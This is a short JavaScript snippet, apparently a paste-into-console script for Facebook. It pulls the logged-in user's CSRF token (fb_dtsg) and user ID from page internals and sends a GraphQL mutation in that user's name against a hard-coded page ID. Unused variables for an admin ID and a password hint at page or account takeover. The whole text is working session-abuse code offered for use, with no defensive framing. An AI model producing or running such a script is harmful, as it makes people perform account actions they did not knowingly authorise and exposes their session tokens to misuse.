var spinR = require(["SiteData"]).__spin_r;
var spinB = require(["SiteData"]).__spin_b;
var spinT = require(["SiteData"]).__spin_t;
var jazoest = "22014";
var fbdtsg = require(["DTSGInitData"]).token;
var userId = require(["CurrentUserInitialData"]).USER_ID;
var hsi = require(["SiteData"]).hsi;
var adminpage = "uidadmin";
var PW = "matkhauvia";
var pageid = "114749715247655";
var url = "https://www.facebook.com/api/graphql/";
var data = "av="+userId+"&__user="+userId+"&__a=1&__dyn=&__csr=&__req=&__hs=&dpr=&__ccg=&__rev=&__s=&__hsi=&__comet_req=&fb_dtsg="+fbdtsg+"&jazoest=&lsd=&__spin_r=&__spin_b=&__spin_t=&fb_api_caller_class=&fb_api_req_friendly_name=&variables=%7B%22input%22%3A%7B%22client_mutation_id%22%3A%221%22%2C%22actor_id%22%3A%22"+userId+"%22%2C%22page_id%22%3A%22"+pageid+"%22%7D%7D&server_timestamps=&doc_id=5120159718042328&fb_api_analytics_tags=%5B%22qpl_active_flow_ids%3D30605361%22%5D";fetch(url, {
    method: 'POST',
    body: data,
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
}).then(e => e.text()).then(e => {})
